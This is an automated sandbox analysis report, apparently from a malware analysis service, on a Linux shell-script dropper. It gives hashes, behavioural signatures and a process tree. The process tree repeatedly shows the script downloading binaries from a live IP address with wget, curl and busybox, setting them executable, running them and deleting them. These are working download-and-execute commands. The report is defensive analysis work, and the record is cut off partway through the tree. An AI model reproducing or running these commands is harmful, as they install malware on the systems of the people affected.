Analysis
-
max time kernel
60s -
max time network
64s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24/11/2024, 02:04
Static task
static1
Behavioral task
behavioral1
Sample
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh
-
Size
10KB
-
MD5
1aa70b102e8502c836ea31a0cfc2110e
-
SHA1
5664c3b03291a47c9ca9e7d8d593334b1270ef62
-
SHA256
1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0
-
SHA512
86734e2ee4c55c4bbbd31cf846a5d177eb0dc2fc70fdf9c4bf2c6bd50fe1b3b674526e6fe42a863d3064d6f87c832c15fe45c472693d96547042f11a718d0084
-
SSDEEP
192:UuW+7fLn0OZXluW8fzFywuW+7fznQ4uW8fzU:0OZXoyUa
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 870 chmod 883 chmod 896 chmod 902 chmod 674 chmod 708 chmod 820 chmod 770 chmod 804 chmod 832 chmod 852 chmod 858 chmod 684 chmod 692 chmod 730 chmod 876 chmod 844 chmod 786 chmod 826 chmod 838 chmod 890 chmod 750 chmod 761 chmod 864 chmod -
Executes dropped EXE 24 IoCs
ioc pid Process /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm 676 9TkivajhPvPyUBtriVhosaz1inakDISTYm /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi 685 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S 694 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK 710 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 732 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk 752 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp 762 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 772 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU 788 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi 806 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 821 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n 827 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw 833 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs 839 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm 845 9TkivajhPvPyUBtriVhosaz1inakDISTYm /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi 853 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S 859 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK 865 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 871 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk 877 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp 885 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 891 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU 897 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi 903 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi -
Checks CPU configuration 1 TTPs 24 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 24 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs curl File opened for modification /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 curl File opened for modification /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU curl File opened for modification /tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1 curl File opened for modification /tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3 curl File opened for modification /tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw curl File opened for modification /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm curl File opened for modification /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi curl File opened for modification /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S curl File opened for modification /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK curl File opened for modification /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi curl File opened for modification /tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm curl File opened for modification /tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU curl File opened for modification /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 curl File opened for modification /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk curl File opened for modification /tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9 curl File opened for modification /tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S curl File opened for modification /tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK curl File opened for modification /tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk curl File opened for modification /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp curl File opened for modification /tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi curl File opened for modification /tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n curl File opened for modification /tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp curl File opened for modification /tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi curl
Processes
-
/tmp/1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh/tmp/1f97d8628a48e551fe88b6271bcf394c4d197d871d425dc3a1ebf0aea43225f0.sh1⤵PID:646
-
/bin/rm/bin/rm bins.sh2⤵PID:649
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:654
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:663
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:671
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:674
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:676
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:677
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:679
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:681
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:683
-
-
/bin/chmodchmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Executes dropped EXE
PID:685
-
-
/bin/rmrm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:686
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:687
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:688
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:689
-
-
/bin/chmodchmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- File and Directory Permissions Modification
PID:692
-
-
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Executes dropped EXE
PID:694
-
-
/bin/rmrm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:695
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:697
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:700
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:705
-
-
/bin/chmodchmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- File and Directory Permissions Modification
PID:708
-
-
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Executes dropped EXE
PID:710
-
-
/bin/rmrm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:711
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:713
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:716
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:728
-
-
/bin/chmodchmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:733
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:735
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:739
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:746
-
-
/bin/chmodchmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:753
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:755
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:760
-
-
/bin/chmodchmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Executes dropped EXE
PID:762
-
-
/bin/rmrm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:763
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:764
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:767
-
-
/bin/chmodchmod 777 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1./MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:773
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:774
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:783
-
-
/bin/chmodchmod 777 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU./uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:789
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:790
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:801
-
-
/bin/chmodchmod 777 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi./bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:808
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:811
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:819
-
-
/bin/chmodchmod 777 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3./f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:822
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:823
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:824
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:825
-
-
/bin/chmodchmod 777 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n./4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:828
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:829
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:831
-
-
/bin/chmodchmod 777 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw./AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:834
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:835
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:837
-
-
/bin/chmodchmod 777 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs./jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:840
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:841
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:843
-
-
/bin/chmodchmod 777 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/9TkivajhPvPyUBtriVhosaz1inakDISTYm./9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm 9TkivajhPvPyUBtriVhosaz1inakDISTYm2⤵PID:846
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:847
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:851
-
-
/bin/chmodchmod 777 H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi./H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm H6m1KqOLdQT13uJvjwqAQdYUgKNYeyf6fi2⤵PID:854
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:855
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:857
-
-
/bin/chmodchmod 777 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S./4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm 4s5sgwNzC6MODeLKkjSkglDurxrEWQSw7S2⤵PID:860
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:861
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:863
-
-
/bin/chmodchmod 777 DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK./DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm DTFHeAp6HL9Sk96sfCk3DGjAIhAyCOxeiK2⤵PID:866
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:867
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:869
-
-
/bin/chmodchmod 777 XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede9./XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:872
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:873
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:875
-
-
/bin/chmodchmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:878
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:879
-
-
